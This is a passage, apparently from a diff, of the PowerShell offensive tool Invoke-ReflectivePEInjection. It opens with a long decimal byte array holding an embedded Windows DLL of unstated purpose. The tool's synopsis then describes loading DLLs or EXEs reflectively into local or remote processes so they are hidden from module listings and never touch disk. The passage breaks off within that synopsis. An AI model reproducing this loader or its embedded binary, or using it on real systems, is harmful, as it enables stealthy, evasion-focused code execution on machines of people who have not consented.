65,73,80,65,80,66,86,102,97,99,101,116,64,108,111,99,97,108,101,64,50,64,80,66,86,52,50,64,64,90,0,64,1,63,63,66,105,100,64,108,111,99,97,108,101,64,115,116,100,64,64,81,65,69,73,88,90,0,0,10,4,63,105,100,64,63,36,99,111,100,101,99,118,116,64,68,68,72,64,115,116,100,64,64,50,86,48,108,111,99,97,108,101,64,50,64,65,0,0,96,0,63,63,48,95,76,111,99,107,105,116,64,115,116,100,64,64,81,65,69,64,72,64,90,0,169,1,63,95,68,101,99,114,101,102,64,102,97,99,101,116,64,108,111,99,97,108,101,64,115,116,100,64,64,81,65,69,80,65,86,49,50,51,64,88,90,0,221,1,63,95,71,101,116,103,108,111,98,97,108,108,111,99,97,108,101,64,108,111,99,97,108,101,64,115,116,100,64,64,67,65,80,65,86,95,76,111,99,105,109,112,64,49,50,64,88,90,0,0,154,0,63,63,49,95,67,111,110,116,97,105,110,101,114,95,98,97,115,101,49,50,64,115,116,100,64,64,81,65,69,64,88,90,0,0,90,0,63,63,48,95,67,111,110,116,97,105,110,101,114,95,98,97,115,101,49,50,64,115,116,100,64,64,81,65,69,64,88,90,0,0,93,2,63,95,79,114,112,104,97,110,95,97,108,108,64,95,67,111,110,116,97,105,110,101,114,95,98,97,115,101,49,50,64,115,116,100,64,64,81,65,69,88,88,90,0,0,156,3,63,102,108,117,115,104,64,63,36,98,97,115,105,99,95,111,115,116,114,101,97,109,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,65,69,65,65,86,49,50,64,88,90,0,0,6,63,116,105,101,64,63,36,98,97,115,105,99,95,105,111,115,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,66,69,80,65,86,63,36,98,97,115,105,99,95,111,115,116,114,101,97,109,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,50,64,88,90,0,0,252,3,63,103,111,111,100,64,105,111,115,95,98,97,115,101,64,115,116,100,64,64,81,66,69,95,78,88,90,0,94,2,63,95,79,115,102,120,64,63,36,98,97,115,105,99,95,111,115,116,114,101,97,109,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,65,69,88,88,90,0,0,24,6,63,117,110,99,97,117,103,104,116,95,101,120,99,101,112,116,105,111,110,64,115,116,100,64,64,89,65,95,78,88,90,0,151,2,63,95,88,108,101,110,103,116,104,95,101,114,114,111,114,64,115,116,100,64,64,89,65,88,80,66,68,64,90,0,153,2,63,95,88,111,117,116,95,111,102,95,114,97,110,103,101,64,115,116,100,64,64,89,65,88,80,66,68,64,90,0,77,83,86,67,80,49,48,48,68,46,100,108,108,0,172,0,63,63,51,64,89,65,88,80,65,88,65,66,85,95,68,101,98,117,103,72,101,97,112,84,97,103,95,116,64,115,116,100,64,64,80,65,68,72,64,90,0,0,169,0,63,63,50,64,89,65,80,65,88,73,65,66,85,95,68,101,98,117,103,72,101,97,112,84,97,103,95,116,64,115,116,100,64,64,80,65,68,72,64,90,0,0,166,1,63,95,68,101,98,117,103,72,101,97,112,84,97,103,95,102,117,110,99,64,115,116,100,64,64,89,65,65,66,85,95,68,101,98,117,103,72,101,97,112,84,97,103,95,116,64,49,64,88,90,0,0,248,3,95,109,107,100,105,114,0,0,92,1,95,95,67,120,120,70,114,97,109,101,72,97,110,100,108,101,114,51,0,0,91,3,95,108,111,99,107,95,102,105,108,101,0,0,201,4,95,117,110,108,111,99,107,95,102,105,108,101,0,0,215,5,102,119,114,105,116,101,0,0,17,6,109,101,109,99,112,121,95,115,0,0,96,6,117,110,103,101,116,99,0,0,187,5,102,103,101,116,99,0,188,5,102,103,101,116,112,111,115,0,143,2,95,102,115,101,101,107,105,54,52,0,211,5,102,115,101,116,112,111,115,0,44,6,115,101,116,118,98,117,102,0,186,5,102,102,108,117,115,104,0,0,101,0,63,63,51,64,89,65,88,80,65,88,64,90,0,0,183,5,102,99,108,111,115,101,0,0,238,2,95,105,110,118,97,108,105,100,95,112,97,114,97,109,101,116,101,114,0,0,38,1,95,67,114,116,68,98,103,82,101,112,111,114,116,87,0,0,21,0,63,63,48,98,97,100,95,99,97,115,116,64,115,116,100,64,64,81,65,69,64,80,66,68,64,90,0,0,65,1,95,67,120,120,84,104,114,111,119,69,120,99,101,112,116,105,111,110,0,0,89,0,63,63,49,98,97,100,95,99,97,115,116,64,115,116,100,64,64,85,65,69,64,88,90,0,20,0,63,63,48,98,97,100,95,99,97,115,116,64,115,116,100,64,64,81,65,69,64,65,66,86,48,49,64,64,90,0,36,0,63,63,48,101,120,99,101,112,116,105,111,110,64,115,116,100,64,64,81,65,69,64,65,66,86,48,49,64,64,90,0,0,65,6,115,116,114,108,101,110,0,0,198,5,102,112,117,116,99,0,16,6,109,101,109,99,112,121,0,0,20,6,109,101,109,115,101,116,0,0,18,6,109,101,109,109,111,118,101,0,204,5,102,114,101,101,0,0,99,0,63,63,50,64,89,65,80,65,88,73,64,90,0,0,34,0,63,63,48,101,120,99,101,112,116,105,111,110,64,115,116,100,64,64,81,65,69,64,65,66,81,66,68,64,90,0,15,1,63,119,104,97,116,64,101,120,99,101,112,116,105,111,110,64,115,116,100,64,64,85,66,69,80,66,68,88,90,0,93,0,63,63,49,101,120,99,101,112,116,105,111,110,64,115,116,100,64,64,85,65,69,64,88,90,0,0,77,83,86,67,82,49,48,48,68,46,100,108,108,0,33,1,95,67,82,84,95,82,84,67,95,73,78,73,84,87,0,0,108,3,95,109,97,108,108,111,99,95,100,98,103,0,135,2,95,102,114,101,101,95,100,98,103,0,76,2,95,101,110,99,111,100,101,100,95,110,117,108,108,0,55,1,95,67,114,116,83,101,116,67,104,101,99,107,67,111,117,110,116,0,233,2,95,105,110,105,116,116,101,114,109,0,234,2,95,105,110,105,116,116,101,114,109,95,101,0,242,1,95,97,109,115,103,95,101,120,105,116,0,0,83,1,95,95,67,112,112,88,99,112,116,70,105,108,116,101,114,0,200,4,95,117,110,108,111,99,107,0,125,1,95,95,100,108,108,111,110,101,120,105,116,0,90,3,95,108,111,99,107,0,2,4,95,111,110,101,120,105,116,0,45,2,95,99,114,116,95,100,101,98,117,103,103,101,114,95,104,111,111,107,0,0,4,1,63,116,101,114,109,105,110,97,116,101,64,64,89,65,88,88,90,0,239,0,63,95,116,121,112,101,95,105,110,102,111,95,100,116,111,114,95,105,110,116,101,114,110,97,108,95,109,101,116,104,111,100,64,116,121,112,101,95,105,110,102,111,64,64,81,65,69,88,88,90,0,0,117,1,95,95,99,108,101,97,110,95,116,121,112,101,95,105,110,102,111,95,110,97,109,101,115,95,105,110,116,101,114,110,97,108,0,0,84,2,95,101,120,99,101,112,116,95,104,97,110,100,108,101,114,52,95,99,111,109,109,111,110,0,95,5,95,119,109,97,107,101,112,97,116,104,95,115,0,0,117,6,119,99,115,99,112,121,95,115,0,0,129,5,95,119,115,112,108,105,116,112,97,116,104,95,115,0,234,0,69,110,99,111,100,101,80,111,105,110,116,101,114,0,202,0,68,101,99,111,100,101,80,111,105,110,116,101,114,0,236,2,73,110,116,101,114,108,111,99,107,101,100,69,120,99,104,97,110,103,101,0,178,4,83,108,101,101,112,0,233,2,73,110,116,101,114,108,111,99,107,101,100,67,111,109,112,97,114,101,69,120,99,104,97,110,103,101,0,0,17,5,87,105,100,101,67,104,97,114,84,111,77,117,108,116,105,66,121,116,101,0,0,3,73,115,68,101,98,117,103,103,101,114,80,114,101,115,101,110,116,0,103,3,77,117,108,116,105,66,121,116,101,84,111,87,105,100,101,67,104,97,114,0,177,3,82,97,105,115,101,69,120,99,101,112,116,105,111,110,0,0,77,5,108,115,116,114,108,101,110,65,0,0,69,2,71,101,116,80,114,111,99,65,100,100,114,101,115,115,0,0,63,3,76,111,97,100,76,105,98,114,97,114,121,87,0,0,192,4,84,101,114,109,105,110,97,116,101,80,114,111,99,101,115,115,0,0,192,1,71,101,116,67,117,114,114,101,110,116,80,114,111,99,101,115,115,0,211,4,85,110,104,97,110,100,108,101,100,69,120,99,101,112,116,105,111,110,70,105,108,116,101,114,0,0,165,4,83,101,116,85,110,104,97,110,100,108,101,100,69,120,99,101,112,116,105,111,110,70,105,108,116,101,114,0,167,3,81,117,101,114,121,80,101,114,102,111,114,109,97,110,99,101,67,111,117,110,116,101,114,0,147,2,71,101,116,84,105,99,107,67,111,117,110,116,0,0,197,1,71,101,116,67,117,114,114,101,110,116,84,104,114,101,97,100,73,100,0,0,193,1,71,101,116,67,117,114,114,101,110,116,80,114,111,99,101,115,115,73,100,0,121,2,71,101,116,83,121,115,116,101,109,84,105,109,101,65,115,70,105,108,101,84,105,109,101,0,207,2,72,101,97,112,70,114,101,101,0,0,203,2,72,101,97,112,65,108,108,111,99,0,74,2,71,101,116,80,114,111,99,101,115,115,72,101,97,112,0,0,20,2,71,101,116,77,111,100,117,108,101,70,105,108,101,78,97,109,101,87,0,0,241,4,86,105,114,116,117,97,108,81,117,101,114,121,0,0,24,2,71,101,116,77,111,100,117,108,101,72,97,110,100,108,101,87,0,0,98,1,70,114,101,101,76,105,98,114,97,114,121,0,75,69,82,78,69,76,51,50,46,100,108,108,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,24,0,0,0,24,0,0,128,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,2,0,0,0,48,0,0,128,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,9,4,0,0,72,0,0,0,112,81,2,0,150,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,239,187,191,60,63,120,109,108,32,118,101,114,115,105,111,110,61,34,49,46,48,34,32,101,110,99,111,100,105,110,103,61,34,85,84,70,45,56,34,32,115,116,97,110,100,97,108,111,110,101,61,34,121,101,115,34,63,62,13,10,60,97,115,115,101,109,98,108,121,32,120,109,108,110,115,61,34,117,114,110,58,115,99,104,101,109,97,115,45,109,105,99,114,111,115,111,102,116,45,99,111,109,58,97,115,109,46,118,49,34,32,109,97,110,105,102,101,115,116,86,101,114,115,105,111,110,61,34,49,46,48,34,62,13,10,32,32,60,116,114,117,115,116,73,110,102,111,32,120,109,108,110,115,61,34,117,114,110,58,115,99,104,101,109,97,115,45,109,105,99,114,111,115,111,102,116,45,99,111,109,58,97,115,109,46,118,51,34,62,13,10,32,32,32,32,60,115,101,99,117,114,105,116,121,62,13,10,32,32,32,32,32,32,60,114,101,113,117,101,115,116,101,100,80,114,105,118,105,108,101,103,101,115,62,13,10,32,32,32,32,32,32,32,32,60,114,101,113,117,101,115,116,101,100,69,120,101,99,117,116,105,111,110,76,101,118,101,108,32,108,101,118,101,108,61,34,97,115,73,110,118,111,107,101,114,34,32,117,105,65,99,99,101,115,115,61,34,102,97,108,115,101,34,62,60,47,114,101,113,117,101,115,116,101,100,69,120,101,99,117,116,105,111,110,76,101,118,101,108,62,13,10,32,32,32,32,32,32,60,47,114,101,113,117,101,115,116,101,100,80,114,105,118,105,108,101,103,101,115,62,13,10,32,32,32,32,60,47,115,101,99,117,114,105,116,121,62,13,10,32,32,60,47,116,114,117,115,116,73,110,102,111,62,13,10,60,47,97,115,115,101,109,98,108,121,62,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,1,0,48,0,0,0,206,59,212,59,231,59,247,59,38,60,76,60,88,60,216,60,22,61,63,61,103,61,117,61,168,61,200,61,86,62,127,62,162,62,201,62,118,63,152,63,0,32,1,0,96,0,0,0,39,48,102,48,143,48,167,48,228,48,119,49,231,49,38,50,79,50,174,50,196,50,216,50,252,50,59,52,60,53,211,54,16,55,28,55,40,55,52,55,64,55,218,56,244,56,8,57,71,57,133,57,41,58,26,59,48,59,68,59,90,59,218,59,0,60,12,60,102,60,143,60,172,60,194,60,214,60,236,60,146,61,117,62,91,63,0,0,0,48,1,0,80,0,0,0,60,48,190,48,248,48,4,49,16,49,28,49,40,49,52,49,186,50,45,51,78,51,97,51,161,51,200,51,212,51,182,52,229,52,6,53,25,53,103,53,140,53,152,53,122,54,113,55,22,60,63,60,89,60,112,60,230,60,15,61,59,61,114,61,140,62,48,63,138,63,163,63,0,64,1,0,108,0,0,0,6,48,47,48,93,49,97,50,121,51,180,51,192,51,204,51,10,53,56,53,170,53,219,53,74,54,102,54,126,54,171,54,200,55,205,55,211,55,226,55,241,55,250,55,2,56,29,56,34,56,39,56,45,56,6,57,47,57,38,58,78,58,141,58,201,58,7,59,143,59,239,59,17,60,52,60,182,60,221,60,88,61,122,61,157,61,29,62,63,62,82,62,115,62,162,62,208,62,220,62,0,80,1,0,112,0,0,0,38,48,77,48,102,48,121,48,132,48,138,48,204,48,226,48,238,48,250,48,22,49,39,49,81,49,104,49,152,49,164,49,176,49,102,52,143,52,171,52,211,52,228,52,20,53,32,53,102,53,143,53,195,53,8,54,25,54,76,54,88,54,133,55,138,55,144,55,132,56,71,57,246,57,123,58,237,58,54,59,95,59,230,59,15,60,166,60,207,60,230,62,15,63,41,63,160,63,208,63,220,63,0,0,0,96,1,0,72,0,0,0,134,48,175,48,223,48,35,49,52,49,100,49,112,49,71,50,118,50,159,50,214,50,249,50,25,51,42,51,70,51,214,51,255,51,29,52,56,52,24,53,232,53,14,56,48,56,214,56,248,56,182,60,188,60,14,62,118,62,124,62,70,63,112,63,0,112,1,0,200,0,0,0,109,48,129,48,131,50,19,52,142,52,158,52,8,53,19,53,29,54,158,54,174,54,246,54,31,55,70,57,109,57,168,57,174,57,193,57,209,57,23,58,72,58,84,58,168,58,174,58,180,58,186,58,192,58,198,58,204,58,210,58,216,58,222,58,228,58,234,58,240,58,246,58,252,58,2,59,8,59,14,59,20,59,26,59,32,59,38,59,44,59,50,59,56,59,62,59,68,59,74,59,80,59,86,59,92,59,98,59,104,59,110,59,116,59,122,59,128,59,134,59,140,59,146,59,152,59,168,59,183,59,201,59,211,59,223,59,252,59,39,60,184,60,199,60,222,60,235,60,243,60,1,61,31,61,123,61,225,61,252,61,2,62,8,62,14,62,20,62,26,62,32,62,38,62,44,62,50,62,56,62,62,62,68,62,74,62,80,62,86,62,0,0,0,128,1,0,32,1,0,0,98,48,117,48,186,48,194,48,238,48,34,49,184,49,190,49,196,49,202,49,208,49,214,49,220,49,226,49,232,49,238,49,244,49,250,49,0,50,6,50,12,50,18,50,24,50,30,50,36,50,42,50,48,50,54,50,60,50,66,50,72,50,78,50,84,50,90,50,96,50,102,50,124,50,137,50,153,50,158,50,164,50,170,50,202,50,215,50,32,51,40,51,48,51,103,51,109,51,146,51,154,51,175,51,184,51,189,51,213,51,218,51,232,51,249,51,255,51,5,52,13,52,41,52,49,52,57,52,65,52,116,52,122,52,159,52,167,52,191,52,198,52,217,52,224,52,48,53,79,53,88,53,101,53,108,53,117,53,124,53,184,53,193,53,198,53,203,53,208,53,214,53,231,53,237,53,24,55,29,55,47,55,87,55,106,55,139,55,160,55,12,56,31,56,83,56,104,56,180,56,88,57,93,57,111,57,131,57,138,57,157,57,188,57,195,57,203,57,210,57,231,57,253,57,2,58,12,58,17,58,192,58,199,58,226,58,44,59,123,59,194,59,230,59,33,60,107,60,139,60,176,60,225,60,9,61,200,61,205,61,223,61,30,62,120,62,125,62,143,62,224,62,76,63,87,63,162,63,220,63,0,144,1,0,8,1,0,0,16,48,21,48,140,48,152,48,180,48,186,48,199,48,206,48,211,48,238,48,244,48,253,48,6,49,11,49,22,49,54,49,63,49,72,49,85,49,99,49,146,49,60,50,67,50,156,50,167,50,226,50,28,51,80,51,85,51,224,51,3,52,10,52,41,52,47,52,53,52,89,52,95,52,101,52,129,52,145,52,152,52,172,52,178,52,184,52,190,52,196,52,202,52,209,52,216,52,223,52,230,52,237,52,244,52,251,52,3,53,11,53,19,53,31,53,40,53,45,53,51,53,61,53,71,53,83,53,95,53,100,53,118,53,123,53,129,53,135,53,159,53,166,53,8,54,13,54,31,54,232,54,237,54,255,54,230,55,4,56,11,56,30,56,52,56,59,56,78,56,98,56,104,56,110,56,116,56,168,57,173,57,191,57,216,57,248,58,254,58,4,59,40,59,51,59,64,59,72,59,87,59,108,59,120,59,132,59,148,59,221,59,232,59,42,60,70,60,75,60,102,60,108,60,114,60,167,60,196,60,32,61,41,61,54,61,64,61,72,61,77,61,84,61,165,61,115,62,122,62,252,62,3,63,252,63,0,160,1,0,136,0,0,0,7,48,32,48,53,48,59,48,65,48,71,48,44,49,55,49,61,49,89,49,94,49,129,49,143,49,168,49,190,49,243,49,18,50,119,50,125,50,140,50,149,50,158,50,167,50,177,50,197,50,92,51,181,51,207,51,88,52,94,52,100,52,106,52,112,52,118,52,124,52,130,52,136,52,142,52,148,52,154,52,160,52,166,52,172,52,178,52,184,52,190,52,196,52,202,52,208,52,214,52,220,52,226,52,232,52,238,52,244,52,250,52,0,53,6,53,12,53,18,53,24,53,30,53,36,53,42,53,0,176,1,0,84,0,0,0,64,51,86,51,118,51,170,51,202,51,231,51,7,52,138,52,14,53,55,53,87,53,144,53,26,54,93,54,141,54,167,54,199,54,231,54,7,55,39,55,71,55,125,55,173,55,221,55,247,55,23,56,55,56,87,56,141,56,189,56,229,56,41,57,96,57,131,57,145,57,171,57,213,57,235,57,0,192,1,0,12,0,0,0,38,58,0,0,0,208,1,0,12,0,0,0,70,58,0,0,0,240,1,0,60,0,0,0,4,49,16,52,188,54,192,54,216,54,220,54,224,54,228,54,232,54,236,54,240,54,244,54,248,54,252,54,0,55,4,55,8,55,12,55,16,55,20,55,20,59,24,59,28,59,164,60,168,60,0,0,0,0,2,0,176,0,0,0,20,48,24,48,28,48,32,48,36,48,40,48,168,52,172,52,176,52,180,52,184,52,192,52,196,52,108,57,112,57,132,57,140,57,144,57,148,57,152,57,156,57,168,57,192,57,204,57,228,57,252,57,4,58,8,58,12,58,16,58,24,58,48,58,72,58,80,58,84,58,88,58,96,58,120,58,132,58,156,58,180,58,188,58,192,58,200,58,224,58,248,58,0,59,8,59,32,59,44,59,68,59,80,59,104,59,128,59,132,59,152,59,160,59,164,59,172,59,196,59,208,59,232,59,0,60,8,60,28,60,32,60,52,60,60,60,64,60,72,60,96,60,108,60,132,60,156,60,164,60,184,60,188,60,208,60,216,60,224,60,248,60,32,63,36,63,0,0,0,16,2,0,208,0,0,0,52,50,56,50,76,52,84,52,96,52,136,52,148,52,184,52,196,52,236,52,12,53,20,53,28,53,36,53,44,53,64,53,96,53,104,53,112,53,120,53,128,53,136,53,152,53,164,53,200,53,212,53,252,53,28,54,36,54,44,54,52,54,60,54,76,54,88,54,132,54,152,54,160,54,188,54,196,54,232,54,240,54,252,54,8,55,44,55,48,55,60,55,80,55,92,55,112,55,124,55,136,55,172,55,184,55,220,55,232,55,12,56,24,56,60,56,72,56,108,56,120,56,156,56,168,56,204,56,216,56,252,56,8,57,52,57,68,57,112,57,120,57,156,57,176,57,200,57,208,57,220,57,224,57,236,57,0,58,12,58,24,58,60,58,72,58,108,58,120,58,156,58,168,58,224,58,232,58,236,58,16,59,44,59,48,59,76,59,80,59,112,59,140,59,144,59,172,59,176,59,0,32,2,0,32,0,0,0,0,48,72,48,144,48,208,48,240,48,20,49,92,49,164,49,196,49,232,49,20,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0)
3
+ function Invoke-ReflectivePEInjection
4
+ {
5
+ <#
6
+ .SYNOPSIS
7
+
8
+ This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
9
+ or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
10
+ please lead the Notes section (GENERAL NOTES) for information on how to use them.
11
+
12
+
13
+ 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process.
14
+ Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process.
15
+
16
+ This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system,
17
+ this will load and execute the DLL/EXE in to memory without writing any files to disk.
18
+
19
+
20
+ 2.) Reflectively load a DLL in to memory of a remote process.
21
+ As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process.
22
+
23
